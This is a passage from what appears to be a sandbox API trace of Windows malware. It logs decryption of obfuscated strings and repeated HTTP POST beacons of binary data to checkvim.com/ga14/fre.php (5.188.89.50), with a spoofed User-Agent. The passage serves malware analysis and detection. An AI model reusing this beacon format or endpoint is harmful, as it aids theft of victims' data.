hHeap=0x840000, dwFlags=0x0, lpMem=0x871b58 | out: hHeap=0x840000) returned 1 [0300.068] GetProcessHeap () returned 0x840000 [0300.068] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0300.068] GetProcessHeap () returned 0x840000 [0300.068] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd40 | out: hHeap=0x840000) returned 1 [0300.068] GetProcessHeap () returned 0x840000 [0300.068] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713d0 | out: hHeap=0x840000) returned 1 [0300.069] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xc58) returned 0x4d4 [0300.070] Sleep (dwMilliseconds=0xea60) [0300.078] GetProcessHeap () returned 0x840000 [0300.078] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa28 [0300.079] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.079] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0300.086] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.086] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fb50) returned 1 [0300.095] GetProcessHeap () returned 0x840000 [0300.095] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0300.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.144] CryptImportKey (in: hProv=0x86fb50, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e830) returned 1 [0300.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.145] CryptSetKeyParam (hKey=0x87e830, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0300.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.146] CryptSetKeyParam (hKey=0x87e830, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0300.146] GetProcessHeap () returned 0x840000 [0300.146] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0300.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.147] CryptDecrypt (in: hKey=0x87e830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa28, pdwDataLen=0x19f9a4 | out: pbData=0x87fa28, pdwDataLen=0x19f9a4) returned 1 [0300.148] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.148] CryptDestroyKey (hKey=0x87e830) returned 1 [0300.149] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.149] CryptReleaseContext (hProv=0x86fb50, dwFlags=0x0) returned 1 [0300.149] GetProcessHeap () returned 0x840000 [0300.150] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0300.150] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0300.151] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0300.151] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0300.152] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0300.152] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0300.153] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0300.153] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0300.154] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0300.154] GetProcessHeap () returned 0x840000 [0300.154] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0300.154] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0300.154] GetProcessHeap () returned 0x840000 [0300.154] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0300.154] GetProcessHeap () returned 0x840000 [0300.154] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0300.154] GetProcessHeap () returned 0x840000 [0300.154] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa28 | out: hHeap=0x840000) returned 1 [0300.154] GetProcessHeap () returned 0x840000 [0300.154] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fe18 [0300.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.155] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0300.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.162] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f820) returned 1 [0300.173] GetProcessHeap () returned 0x840000 [0300.173] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0300.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.174] CryptImportKey (in: hProv=0x86f820, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e370) returned 1 [0300.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.179] CryptSetKeyParam (hKey=0x87e370, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0300.180] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.180] CryptSetKeyParam (hKey=0x87e370, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0300.180] GetProcessHeap () returned 0x840000 [0300.181] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0300.181] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.182] CryptDecrypt (in: hKey=0x87e370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fe18, pdwDataLen=0x19f9a4 | out: pbData=0x87fe18, pdwDataLen=0x19f9a4) returned 1 [0300.182] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.183] CryptDestroyKey (hKey=0x87e370) returned 1 [0300.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.184] CryptReleaseContext (hProv=0x86f820, dwFlags=0x0) returned 1 [0300.184] GetProcessHeap () returned 0x840000 [0300.184] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0300.184] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0300.185] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0300.186] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0300.186] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0300.187] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0300.187] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0300.187] GetProcessHeap () returned 0x840000 [0300.187] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0300.187] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871290*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0300.212] GetProcessHeap () returned 0x840000 [0300.212] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b28 [0300.212] socket (af=2, type=1, protocol=6) returned 0x4d8 [0300.212] connect (s=0x4d8, name=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0300.280] FreeAddrInfoW (pAddrInfo=0x871290*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0300.280] GetProcessHeap () returned 0x840000 [0300.281] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f248 [0300.281] GetProcessHeap () returned 0x840000 [0300.281] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0300.281] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0300.282] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0300.282] GetProcessHeap () returned 0x840000 [0300.282] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0300.282] GetProcessHeap () returned 0x840000 [0300.282] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0300.282] GetProcessHeap () returned 0x840000 [0300.282] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f830 [0300.282] GetProcessHeap () returned 0x840000 [0300.282] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0300.283] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0300.284] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0300.284] GetProcessHeap () returned 0x840000 [0300.284] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0300.284] GetProcessHeap () returned 0x840000 [0300.284] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0300.284] send (s=0x4d8, buf=0x873a58*, len=237, flags=0) returned 237 [0300.285] send (s=0x4d8, buf=0x87eb58*, len=159, flags=0) returned 159 [0300.285] GetProcessHeap () returned 0x840000 [0300.285] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0300.285] recv (in: s=0x4d8, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0300.644] GetProcessHeap () returned 0x840000 [0300.644] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0300.644] GetProcessHeap () returned 0x840000 [0300.644] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f830 | out: hHeap=0x840000) returned 1 [0300.644] GetProcessHeap () returned 0x840000 [0300.644] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0300.644] GetProcessHeap () returned 0x840000 [0300.644] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f248 | out: hHeap=0x840000) returned 1 [0300.644] closesocket (s=0x4d8) returned 0 [0300.644] GetProcessHeap () returned 0x840000 [0300.644] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b28 | out: hHeap=0x840000) returned 1 [0300.644] GetProcessHeap () returned 0x840000 [0300.644] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0300.644] GetProcessHeap () returned 0x840000 [0300.644] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fe18 | out: hHeap=0x840000) returned 1 [0300.644] GetProcessHeap () returned 0x840000 [0300.644] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0300.645] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1278) returned 0x4d8 [0300.646] Sleep (dwMilliseconds=0xea60) [0300.654] GetProcessHeap () returned 0x840000 [0300.654] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc68 [0300.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.657] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0300.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.663] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0300.668] GetProcessHeap () returned 0x840000 [0300.668] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0300.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.669] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e9b0) returned 1 [0300.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.670] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0300.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.671] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0300.671] GetProcessHeap () returned 0x840000 [0300.671] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0300.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.671] CryptDecrypt (in: hKey=0x87e9b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc68, pdwDataLen=0x19f9a4 | out: pbData=0x87fc68, pdwDataLen=0x19f9a4) returned 1 [0300.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.672] CryptDestroyKey (hKey=0x87e9b0) returned 1 [0300.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.673] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0300.673] GetProcessHeap () returned 0x840000 [0300.673] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0300.673] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0300.674] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0300.674] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0300.674] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0300.675] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0300.675] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0300.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0300.676] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0300.676] GetProcessHeap () returned 0x840000 [0300.676] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0300.676] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0300.676] GetProcessHeap () returned 0x840000 [0300.676] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0300.676] GetProcessHeap () returned 0x840000 [0300.676] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0300.676] GetProcessHeap () returned 0x840000 [0300.676] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc68 | out: hHeap=0x840000) returned 1 [0300.676] GetProcessHeap () returned 0x840000 [0300.676] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fdd0 [0300.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.677] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0300.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.681] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0300.686] GetProcessHeap () returned 0x840000 [0300.686] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0300.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.687] CryptImportKey (in: hProv=0x870128, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e8f0) returned 1 [0300.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.687] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0300.688] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.688] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0300.688] GetProcessHeap () returned 0x840000 [0300.688] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0300.689] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.689] CryptDecrypt (in: hKey=0x87e8f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fdd0, pdwDataLen=0x19f9a4 | out: pbData=0x87fdd0, pdwDataLen=0x19f9a4) returned 1 [0300.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.690] CryptDestroyKey (hKey=0x87e8f0) returned 1 [0300.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0300.691] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0300.691] GetProcessHeap () returned 0x840000 [0300.691] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0300.691] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0300.691] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0300.692] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0300.692] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0300.693] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0300.693] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0300.693] GetProcessHeap () returned 0x840000 [0300.693] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8714e8 [0300.693] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0300.694] GetProcessHeap () returned 0x840000 [0300.694] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b58 [0300.694] socket (af=2, type=1, protocol=6) returned 0x4dc [0300.694] connect (s=0x4dc, name=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0300.763] FreeAddrInfoW (pAddrInfo=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0300.763] GetProcessHeap () returned 0x840000 [0300.763] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fce8 [0300.763] GetProcessHeap () returned 0x840000 [0300.763] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0300.764] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0300.766] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0300.766] GetProcessHeap () returned 0x840000 [0300.766] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0300.766] GetProcessHeap () returned 0x840000 [0300.766] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0300.766] GetProcessHeap () returned 0x840000 [0300.766] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fbd8 [0300.766] GetProcessHeap () returned 0x840000 [0300.766] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0300.767] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0300.769] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0300.769] GetProcessHeap () returned 0x840000 [0300.769] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0300.769] GetProcessHeap () returned 0x840000 [0300.769] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0300.769] send (s=0x4dc, buf=0x873a58*, len=237, flags=0) returned 237 [0300.769] send (s=0x4dc, buf=0x87eb58*, len=159, flags=0) returned 159 [0300.769] GetProcessHeap () returned 0x840000 [0300.770] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0300.770] recv (in: s=0x4dc, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0301.153] GetProcessHeap () returned 0x840000 [0301.153] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0301.153] GetProcessHeap () returned 0x840000 [0301.153] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fbd8 | out: hHeap=0x840000) returned 1 [0301.153] GetProcessHeap () returned 0x840000 [0301.153] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0301.153] GetProcessHeap () returned 0x840000 [0301.153] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fce8 | out: hHeap=0x840000) returned 1 [0301.153] closesocket (s=0x4dc) returned 0 [0301.153] GetProcessHeap () returned 0x840000 [0301.153] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b58 | out: hHeap=0x840000) returned 1 [0301.153] GetProcessHeap () returned 0x840000 [0301.153] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0301.153] GetProcessHeap () returned 0x840000 [0301.153] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0301.153] GetProcessHeap () returned 0x840000 [0301.153] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8714e8 | out: hHeap=0x840000) returned 1 [0301.153] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xd90) returned 0x4dc [0301.155] Sleep (dwMilliseconds=0xea60) [0301.192] GetProcessHeap () returned 0x840000 [0301.192] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fbd8 [0301.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.193] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0301.198] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.198] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0301.205] GetProcessHeap () returned 0x840000 [0301.205] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0301.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0301.206] CryptImportKey (in: hProv=0x86f688, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, 